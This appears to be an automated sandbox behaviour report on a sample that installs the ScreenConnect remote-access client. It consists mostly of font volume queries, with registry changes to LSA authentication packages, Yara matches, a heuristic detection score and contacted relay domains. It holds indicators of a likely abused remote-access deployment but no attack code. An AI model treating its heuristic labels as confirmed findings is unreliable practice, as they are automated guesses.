Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe

Code function: 6_2_0572E7C8 CreateNamedPipeW,

6_2_0572E7C8

Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe

Code function: 6_2_01874D2F RtlGetVersion,

6_2_01874D2F

Source: C:\Windows\SysWOW64\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Modifies security policies related information

Source: C:\Windows\System32\msiexec.exe

Registry key created or modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa Authentication Packages

Jump to behavior

Yara detected ScreenConnect Tool

Source: Yara match	File source: 7.2.ScreenConnect.WindowsClient.exe.23ffa10.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.ScreenConnect.WindowsClient.exe.40000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000000.1732916566.0000000000042000.00000002.00000001.01000000.00000010.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2940786358.0000000002381000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: ScreenConnect.WindowsClient.exe PID: 7716, type: MEMORYSTR
Source: Yara match	File source: C:\Windows\Installer\MSI15E7.tmp, type: DROPPED
Source: Yara match	File source: C:\Config.Msi\4c1433.rbs, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe, type: DROPPED

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
147.75.63.168	server-nix9656e2a4-relay.screenconnect.com	Switzerland		54825	PACKETUS	false

Private

IP
127.0.0.1

Contacted Domains

Name	IP	Active
server-nix9656e2a4-relay.screenconnect.com	147.75.63.168	true
instance-xkznvd-relay.screenconnect.com	unknown	unknown

AV Detection

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 93.9% probability

Source:	Binary string: C:\builds\cc\cwcontrol\Product\WindowsFileManager\obj\Release\ScreenConnect.WindowsFileManager.pdb source: ScreenConnect.WindowsFileManager.exe.1.dr
Source:	Binary string: \??\C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.Client.pdb source: ScreenConnect.ClientService.exe, 00000006.00000002.2948001083.000000000550A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller\Microsoft.Deployment.WindowsInstaller.pdbT source: Microsoft.Deployment.WindowsInstaller.dll.3.dr
